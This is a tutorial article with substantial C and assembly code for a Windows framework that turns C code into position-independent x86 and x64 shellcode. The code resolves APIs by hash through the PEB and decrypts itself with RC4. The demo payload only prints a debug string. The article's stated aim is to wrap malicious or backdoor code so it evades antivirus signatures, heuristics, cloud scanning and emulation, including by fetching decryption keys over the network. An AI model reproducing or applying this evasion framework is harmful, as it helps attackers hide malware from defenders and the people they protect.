Advanced Shellcode Programming Techniques on Windows
I. Preface
II. Concept of functional binary shellcode
III. Choice of high-level language
IV. x86 c2shellcode framework
V. x64 c2shellcode framework
VI. Summary
VII. Thanks
I. Preface
The techniques described in this article have been used in practice for a long time, but for various reasons they have never been written up. This article provides code for the key points and adds some of the author's own new insights.
The test code is organized into the following directories:
test1: 32-bit and 64-bit shellcode and the corresponding test tools
test2: x86 c2shellcode framework
test3: writing shellcode with the dup directive reserving space in the .text section
test4: a second layer of SMC (self-modifying code) in shellcode
test5: x64 c2shellcode framework
II. Concept of functional binary shellcode
This is an era of intense attack and defense. Anti-virus detection is now multi-layered: signatures, cloud scanning, proactive defense (HIPS), heuristics, and virtual-machine emulation. If malicious code is confined to a fixed PE format, it cannot be quickly mutated to evade detection. The code therefore needs to escape static detection after simple processing and to load and run without relying on the Windows loader. Shellcode fits these requirements exactly. The shellcode discussed in this article is not the traditional kind used in scenarios with strict length limits. It may be built from thousands or tens of thousands of lines of source code, yet it is still binary code that runs as soon as it is copied into memory (for example with CopyMemory) and EIP is pointed at it. This article calls it functional shellcode. Given the amount of code and the functionality required, writing functional shellcode in pure assembly is clearly not cost-effective.
III. Choice of high-level language
1. Writing functional shellcode in Delphi
The compilers most commonly used for shellcode today are Delphi and VC. A brief word on Delphi: the Borland compiler does not place string constants in the data section but directly after the function that uses them, so strings are much easier to handle than in VC. Delphi also supports x64 inline assembly, which makes it even more capable for writing x64 shellcode. Early pioneers in the community, such as Anskya (Queen) and xfish, generally used Delphi to write functional shellcode.
2. Writing functional shellcode in VC
The test1 directory contains two binary files, 32shellcode.bin and 64shellcode.bin. They are two pieces of shellcode that run on x86 and x64 respectively. Start the DebugView tool to capture their output, then run the following commands to test them.
32runbin.exe 32shellcode.bin
64runbin.exe 64shellcode.bin
On an x64 system, 32shellcode.bin also runs reliably under WOW64.
Next we introduce functional shellcode written with VC.
IV. x86 c2shellcode framework
1. c2shellcode framework overview
This is a 32-bit shellcode framework built with VS2008. Native APIs and ring3 APIs can be called easily from the shellcode. To generate the shellcode, comment out the HHL_DEBUG switch, build, and run the resulting EXE.
Let's take a look at this project.
void main()
{
#ifdef HHL_DEBUG
    InitApiHashToStruct();
    ShellCode_Start();
#else
    InitApiHashToStruct();
#endif
}
The main function is simple and is controlled by a debug switch. The switch determines where the global ShellData structure lives. When the switch is commented out, ShellData is appended to the tail of the shellcode. When it is enabled, ShellData lives in the .data section, which makes it convenient to debug the C source code in the VC IDE.
2. Execution flow with the HHL_DEBUG switch enabled
2.1 Fill the function hashes into the ShellData struct
The first step is the InitApiHashToStruct function. It uses a fairly traditional rotate-and-add hash. You can call GetRolHash directly with a string to compute a single hash, or fill the hashes into the ShellData struct in a batch.
DWORD GetRolHash(char *lpszBuffer)
{
    DWORD dwHash = 0;
    while (*lpszBuffer)
    {
        // Rotate the 32-bit hash right by 7 bits (same as left by 25), then add the character.
        dwHash = ((dwHash << 25) | (dwHash >> 7));
        dwHash = dwHash + *lpszBuffer;
        lpszBuffer++;
    }
    return dwHash;
}
2.2 Walk the export table by function hash to obtain function addresses
The ShellCode_Start function jumps straight to ShellCodeEntry, where the shellcode starts executing.
__declspec(naked) void ShellCode_Start()
{
    __asm
    {
        jmp ShellCodeEntry
    }
}
Note that the string is defined as a local array inside the ShellCodeEntry function. Check the result in IDA.
PVOID ShellCodeEntry()
{
    char hhl[] = {'h','e','l','l','o','g','i','r','l',0};
#ifndef HHL_DEBUG
    DWORD offset = ReleaseRebaseShellCode();
    PShellData lpData = (PShellData)(offset + (DWORD)Shellcode_Final_End);
#endif
    GetRing3ApiAddr();
    lpData->xOutputDebugStringA(hhl);
    return (PVOID)lpData;
}
As you can see, a string defined this way is built on the stack by instructions in the .text section instead of being stored in the .data section.
The GetRing3ApiAddr function is mainly responsible for the following:
1. Get the kernel32 base address through the get_k32base_peb() function.
2. Get the ntdll base address through the get_ntdllbase_peb() function. Alternatively, load ntdll directly with LoadLibrary.
3. Obtain the addresses of LoadLibrary and GetProcAddress.
4. Load the other required modules, such as psapi and advapi32, and obtain their base addresses.
5. Pass the hash of the target function and the base address of the target module to Hash_GetProcAddress, which parses the export table, finds the function's address, and stores it in the ShellData struct.
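__declspec(naked) DWORD get_k32base_peb()
{
    __asm
    {
        mov eax, fs:[030h]      ; PEB
        test eax, eax
        js finished
        mov eax, [eax + 0ch]    ; PEB->Ldr
        mov eax, [eax + 14h]    ; InMemoryOrderModuleList, first entry
        mov eax, [eax]          ; second entry
        mov eax, [eax]          ; third entry, expected to be kernel32
        mov eax, [eax + 10h]    ; DllBase
    finished:
        ret
    }
}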
This code obtains the kernel32 base address on Windows XP through Windows 8.1.
2.3 Pass the parameters and call through the resolved function addresses
Finally, OutputDebugStringA is called to print a string and confirm that the shellcode works.
lpData->xOutputDebugStringA(hhl);
3. Execution flow with the HHL_DEBUG switch commented out
#ifndef HHL_DEBUG
    dwSize = (DWORD)Shellcode_Final_End - (DWORD)ShellCode_Start;
    dwShellCodeSize = dwSize + sizeof(TShellData);
    lpBuffer = (PUCHAR)GlobalAlloc(GMEM_FIXED, dwShellCodeSize);
    if (lpBuffer)
    {
        CopyMemory(lpBuffer, ShellCode_Start, dwSize);
        CopyMemory(lpBuffer + dwSize, &ShellData, sizeof(TShellData));
        hFile = CreateFileA("GetRing3ApiAddr.bin", GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, 0);
        if (hFile != INVALID_HANDLE_VALUE)
        {
            if (WriteFile(hFile, lpBuffer, dwShellCodeSize, &dwBytes, NULL))
            {
                printf("Save ShellCode Success.\n");
            }
            CloseHandle(hFile);
        }
        GlobalFree(lpBuffer);
    }
#endif
As you can see, once the HHL_DEBUG switch is commented out, all we do is copy a specific memory region. But how do we determine which region to copy?
4. How to determine the start and end of the shellcode
Load the generated PE file into IDA, and you can see the start and end addresses of the binary code.
You only need to copy from ShellCode_Start to the end of the InitApiHashToStruct function.
5. c2shellcode notes
1. Jump instructions must use relative addressing.
2. Avoid storing strings in the .data section.
3. Handle global variables properly.
In the c2shellcode framework, global variables are stored in TShellData and accessed through the lpData pointer. Because the shellcode can be loaded at any address, the address of TShellData has to be relocated at run time. The function that computes the relocation offset is ReleaseRebaseShellCode.
DWORD ReleaseRebaseShellCode()
{
    DWORD dwOffset;
    __asm
    {
        call GetEIP
    GetEIP:
        pop eax                 ; eax = run-time address of GetEIP
        sub eax, offset GetEIP  ; subtract its link-time address
        mov dwOffset, eax
    }
    return dwOffset;
}
Adding this offset to the link-time address of Shellcode_Final_End makes the pointer refer to TShellData, which holds the shellcode's global variables.
PShellData lpData = (PShellData)(offset + (DWORD)Shellcode_Final_End);
Indexing TShellData
6. Advantages of writing shellcode in a high-level language
The advantage of writing shellcode in a high-level language is that you do not need to worry about stack balance, and you can use compiler optimization options to reduce the size of the generated shellcode.
Debugging is another major advantage. You only need to focus on implementing the functionality and not on trivial details such as whether a function address was resolved correctly, and the source code is far more readable. With the symbol table loaded, the shellcode can be debugged at the C source level in the VC IDE, and you can see at a glance whether the function addresses in the struct have been filled in correctly.
7. Calling ASM from C, and reserving space in the .text section with the dup directive
The c2shellcode framework in test2 appends the global struct to the end of the shellcode, but this is not required. The VC toolchain lets ASM call C and C call ASM, on both 32-bit and 64-bit platforms. The related code is in the test3 directory.
.386
.model flat, c
.code
public AsmShellData
public AsmChar
public hellohhl
AsmShellData proc
    byte 2000 dup (8)
AsmShellData endp
AsmChar proc
    byte 2000 dup (6)
AsmChar endp
hellohhl proc
    sztext db 'hellohhl', 0
hellohhl endp
end
This is the assembly code.
In AsmShellData, the dup directive reserves 2000 bytes in the .text section.
Using 0 as the fill value is not recommended here, because an additional .bss section is then added when the obj file is linked: a fill of 0 is treated as uninitialized data, and the .bss section is where uninitialized data is stored.
The ASM file exports several new symbols:
The AsmShellData dup placeholder stores the shellcode's global variables.
The AsmChar dup placeholder stores the shellcode's global strings.
hellohhl marks the end of the shellcode.
Note that two new macros are defined.
#define shellcode_final_end hellohhl
#define shellcode_final_start ShellCode_Start
Why define them this way? Load the binary into IDA.
The start and end of the shellcode are clearly visible. You only need to copy the code from ShellCode_Start up to hellohhl to obtain the shellcode.
#ifndef HHL_DEBUG
    b1 = VirtualProtect(AsmShellData, sizeof(TShellData), PAGE_EXECUTE_READWRITE, &dwOldProtect);
    CopyMemory(AsmShellData, &ShellData, sizeof(TShellData));
    dwSize = (DWORD)shellcode_final_end - (DWORD)shellcode_final_start;
    lpBuffer = (PUCHAR)GlobalAlloc(GMEM_FIXED, dwSize);
    if (lpBuffer)
    {
        CopyMemory(lpBuffer, shellcode_final_start, dwSize);
        hFile = CreateFileA("hhlsh.bin", GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
        if (hFile != INVALID_HANDLE_VALUE)
        {
            if (WriteFile(hFile, lpBuffer, dwSize, &dwBytes, NULL))
            {
                printf("Save ShellCode Success.\n");
            }
            CloseHandle(hFile);
        }
        GlobalFree(lpBuffer);
    }
#endif
Because the AsmShellData placeholder created with the dup directive is located in the .text section, you must first change the memory protection with VirtualProtect and only then copy the global variables into that space. The code still needs to be relocated, but this time the pointer can point directly at AsmShellData.
#ifndef HHL_DEBUG
    DWORD offset = ReleaseRebaseShellCode();
    PShellData lpData = (PShellData)((DWORD)AsmShellData + offset);
#endif
As you can see, memory is allocated only once, and the ShellData struct no longer has to be copied to the end of the shellcode.
8. Applying SMC multiple times in shellcode
You may have noticed that this shellcode has relied on SMC (self-modifying code) from the very beginning: a large region of the code section stores hashes, and at run time that region overwrites itself with function addresses. You may not be fully satisfied with a single layer of SMC, however.
I do not intend to use the traditional XOR method for self-decryption here. This time the shellcode decrypts itself with standard RC4. The project is in the test4 directory, where you can see how code is added to c2shellcode. If you wish, you can add conditions and a loop so that the shellcode is decrypted 4 bytes at a time, which I believe raises the bar for reverse analysis.
In the shellcode_ntapi_utility.h header file, two new RC4 encryption and decryption functions are added for the shellcode to call.
When the shellcode is generated, the hash region is encrypted with the key hellogirl.
When the shellcode starts executing, the hash region is first decrypted, and the hashes are then replaced with the real API addresses by a second round of SMC.
Run runbin.exe hhlsh.bin. After the shellcode decrypts itself with RC4, the familiar string appears in DebugView again.
The related code is in the test4 directory and is not analyzed in detail here.
V. x64 c2shellcode framework
I do not recommend combining a 32-bit project and a 64-bit project in a single project by means of preprocessor directives.
The 64-bit c2shellcode is in the test5 directory and differs from the 32-bit version.
We again start from the main function to introduce the c2shellcode framework under x64.
void main()
{
#ifdef HHL_DEBUG
    InitApiHashToStruct();
    AlignRSPAndCallShEntry();
#else
    InitApiHashToStruct();
#endif
}
Like the 32-bit c2shellcode framework, the InitApiHashToStruct function is used to populate the hash data into the ShellData struct.
The entry function of shellcode is a function exported from ASM.
First, let's look at the code in the asm file. The AlignRSPAndCallShEntry function aligns the stack pointer to 16 bytes. Without this alignment, the program crashes as soon as code performs aligned stack accesses with the 128-bit XMM registers. Once the stack is aligned, the 64-bit shellcode is executed directly.
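EXTRN ShellCode_Entry:PROC          ; this function is in C
PUBLIC AlignRSPAndCallShEntry
AlignRSPAndCallShEntry PROC
    push rsi                        ; preserve rsi
    mov rsi, rsp                    ; save the original stack pointer
    and rsp, 0FFFFFFFFFFFFFFF0h     ; align rsp down to 16 bytes
    sub rsp, 020h                   ; reserve 32 bytes for the callee
    call ShellCode_Entry
    mov rsp, rsi                    ; restore the original stack pointer
    pop rsi
    ret
AlignRSPAndCallShEntry ENDP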
You can see that in the AlignRSPAndCallShEntry function, with the help of asm call c, we return to the C function ShellCode_Entry to start code execution.
PVOID ShellCode_Entry()
{
    char hhl[] = {'h','e','l','l','o','h','h','l',0};
#ifndef HHL_DEBUG
    PShellData lpData = (PShellData)((ULONG64)Shellcode_Final_End);
#endif
    GetRing3ApiAddr();
    lpData->xOutputDebugStringA(hhl);
    return (PVOID)lpData;
}
On 64-bit, as before, we still need to get the base address of kernel32 and then parse its export table to get the addresses of the required functions.
PUBLIC get_kernel32_peb_64
get_kernel32_peb_64 PROC
    mov rax, 30h
    mov rax, gs:[rax]       ; TEB (self pointer)
    mov rax, [rax+60h]      ; PEB
    mov rax, [rax+18h]      ; PEB->Ldr
    mov rax, [rax+10h]      ; InLoadOrderModuleList, first entry
    mov rax, [rax]          ; second entry
    mov rax, [rax]          ; third entry
    mov rax, [rax+30h]      ; DllBase
    ret
get_kernel32_peb_64 ENDP
The code above obtains the kernel32 base address on x64 Windows 7 through Windows 8.1.
When the HHL_DEBUG switch is removed to generate the shellcode, ShellData still has to be located at run time. Thanks to RIP-relative addressing on 64-bit processors, the end marker of the shellcode is all we need to find ShellData, which holds the global variables.
PShellData lpData = (PShellData)((ULONG64)Shellcode_Final_End);
When generating the shellcode, we only need to copy the binary code of the specified region. Here we again append ShellData to the tail of the shellcode to hold the global variables. If you prefer, you can instead reserve space in the .text section with the dup directive, as before.
dwSize = (ULONG64)Shellcode_Final_End - (ULONG64)Shellcode_Final_Start;
dwShellCodeSize = dwSize + sizeof(TShellData);
lpBuffer = (PUCHAR)GlobalAlloc(GMEM_FIXED, dwShellCodeSize);
if (lpBuffer)
{
    CopyMemory(lpBuffer, Shellcode_Final_Start, dwSize);
    CopyMemory(lpBuffer + dwSize, &ShellData, sizeof(TShellData));
    hFile = CreateFileA("64shellcode.bin", GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
    if (hFile != INVALID_HANDLE_VALUE)
    {
        if (WriteFile(hFile, lpBuffer, dwShellCodeSize, &dwBytes, NULL))
        {
            printf("Save ShellCode Success.\n");
        }
        CloseHandle(hFile);
    }
    GlobalFree(lpBuffer);
}
Again, check the result in IDA.
PUBLIC MyShellCodeFinalEnd
MyShellCodeFinalEnd PROC
    xor rax, rax
    ret
MyShellCodeFinalEnd ENDP
END
As you can see, the bytes between ShellCode_Start and MyShellCodeFinalEnd are the shellcode.
VI. Summary
Once you can read c2shellcode, you will find that it contains nothing fundamentally new. A few toolchain features (for example, reserving space in the .text section with the assembler's dup directive) make it easy to handle global strings, global variables, and the start and end of the shellcode.
What is shellcode? Whether it is code or data, anything binary and position-independent is shellcode. Whichever compiler you use, GCC, Delphi, or VC, as long as the binary output is position-independent, or is made position-independent through post-processing, it is shellcode.
Functional shellcode is mainly used to respond quickly to anti-virus detection:
Encapsulating malicious code as shellcode: counters signatures and cloud scanning
Self-modifying code with multi-layer SMC: counters heuristics, virtual machines, and cloud scanning
Randomized code sections and PE structure: counters PE-structure-based detection and cloud scanning
Whitelisting techniques: counter the proactive defense of foreign security products
1. About multi-layer SMC
The hash region (ShellData) that stores the API addresses has to be decrypted several times, each time with a key, before the real API addresses are restored, and every API address used by the malicious code comes from the ShellData region. The key can easily be placed in a registry value or a file, or received over the network. As a result, the anti-virus virtual machine cannot simulate the API calls made by the malicious code.
2. About randomized code sections and PE structure
The existing approach uses the following directives.
#pragma code_seg(push, r2, ".test")
// your backdoor code
#pragma code_seg(pop, r2)
This places the code in a .test section. Alternatively, sections can be merged with the following directives.
#pragma comment(linker, "/MERGE:.rdata=.data") // merge the .rdata section into .data
#pragma comment(linker, "/MERGE:.text=.data") // merge the .text section into .data
#pragma comment(linker, "/MERGE:.reloc=.data") // merge the .reloc section into .data
With these methods it is easy to tell that the PE was modified by hand, and heuristics based on PE structure will flag it.
Reserving space in the .text section with the dup directive, combined with SMC, gives control over almost every byte of the malicious code.